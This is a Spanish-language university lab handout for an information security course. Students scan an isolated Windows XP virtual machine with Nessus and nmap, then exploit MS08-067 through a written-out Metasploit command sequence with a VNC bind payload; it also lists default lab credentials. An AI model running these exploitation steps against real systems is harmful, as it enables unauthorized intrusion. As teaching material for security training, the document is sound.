UNIVERSIDAD CATÓLICA DE COLOMBIA

ESPECIALIZACIÓN SEGURIDAD DE LA INFORMACION

MODULO: TECNOLOGÍAS Y HERRAMIENTAS EN
SEGURIDAD DE LA INFORMACIÓN Y LAS REDES
CURSO ABRIL-MAYO 2023

USO DE LAS HERRAMIENTAS: ESCANER DE VULNERABILIDADES, ESCANER DE

RED Y FRAMEWORK DE EXPLOTACIÓN
TALLER 002

INTRODUCCION

El taller consiste en la ejecución de un escáner de vulnerabilidades y la explotación de la

vulnerabilidad critica MS08-067, para esto se tiene como objetivo un sistema operativo
Windows XP. La actividad se ejecutará desde el sistema operativo Kali Linux.

OBJETIVOS
• Conocer los procesos de escaneo de vulnerabilidades con Nessus
• Conocer los procesos de escaneo de vulnerabilidades con nmap
• Configuración y operación de entornos virtualizados
• Adquirir competencias en el proceso de explotación de vulnerabilidades de SO

ENUNCIADOS

1. Instalar la herramienta de virtualización Oracle Virtual Box última versión.

2. Importar el archivo WinXp.ova (proporcionado por el profesor) (no tiene

contraseña) en una máquina virtual de Virtual Box

3. Importar la última versión del sistema operativo Kali Linux en una máquina virtual
de Virtual Box (proporcionado por el profesor) (el usuario y contraseña de Kali
Linux son los valores por defecto, usuario=kali, contraseña=kali).

4. Para su conocimiento la versión entregada de Kali Linux ya tiene preinstalado el

escáner de vulnerabilidades Nessus. (http://localhost:8834, usuario: laboratorio,
contraseña: laboratorio) y el framework de ataque Metasploit Framework.

5. Con los dos pasos anteriores el entorno tendrá dos sistemas operativos en
ejecución, Windows XP y Kali Linux.

6. Configurar y validar la conectividad de red entre las dos maquinas virtuales, la

maquina Windows XP fue creada con la configuración de red de Virtual Box
“Internal Network”, esta es una configuración que despliega una red privada para
las maquinas virtuales anexas a ella, sin contacto de red con el computador
anfitrión ni la red externa. La IP configurada en el SO Windows XP es 10.0.1.200.
La maquina virtual Kali Linux debe ser reconfigurada para que interactúe con la
maquina Windows y tome la dirección IP 10.0.1.100.

7. Lanzar el escáner de vulnerabilidades Nessus desde Kali linux, teniendo como

objetivo el SO Windows XP.

8. Lanzar el escáner de red nmap desde Kali Linux, teniendo como objetivo el SO
Windows XP, la intención es confirmar la vulnerabilidad critica ms08-067
 UNIVERSIDAD CATÓLICA DE COLOMBIA
ESPECIALIZACIÓN SEGURIDAD DE LA INFORMACION
MODULO: TECNOLOGÍAS Y HERRAMIENTAS EN
SEGURIDAD DE LA INFORMACIÓN Y LAS REDES
CURSO ABRIL-MAYO 2023

USO DE LAS HERRAMIENTAS: ESCANER DE VULNERABILIDADES, ESCANER DE

RED Y FRAMEWORK DE EXPLOTACIÓN
TALLER 002

identificada en OpenVAS. Para esto se debe abrir una terminal y teclear el

siguiente comando:

#nmap --script smb-vuln-ms08-067.nse –p445 <target>

*<target> se debe cambiar por la ip de la maquina objetivo.

9. Explotar la vulnerabilidad MS08-067 en el SO Windows XP, si esta fue encontrada.

Para esto se utiliza el framework de ataque Metasploit picando en el grupo de
aplicaciones “Exploitation Tools” luego en el enlace “metasploit framework” y se
digitan las siguientes instrucciones:

a. msf> search ms08_067

b. msf> use windows/smb/ms08_067_netapi
c. msf> show payloads
d. msf> set PAYLOAD windows/vncinject/bind_tcp
e. msf> show options
f. msf> set RHOST 10.0.1.200
g. msf> exploit

10. Una vez finalizada la parte práctica responda las siguientes preguntas:

a. Como se evidenció la existencia de la vulnerabilidad MS08-067 en el

sistema operativo Windows XP?

b. Porque razón el sistema operativo Windows XP es vulnerable a MS08-067?

Que versiones de Windows XP son vulnerables?

c. Como se corrige la vulnerabilidad MS08-067?

d. Cual código CVE (Common Vulerabilties and Exposure) esta asociado a la

vulnerabilidad MS08-067

e. Construya una tabla y relacione que otras vulnerabilidades criticas se

encontraron en el sistema operativo Windows XP?

f. Que es Nessus?

g. Que es nmap?

h. Que es “metasploit framework”?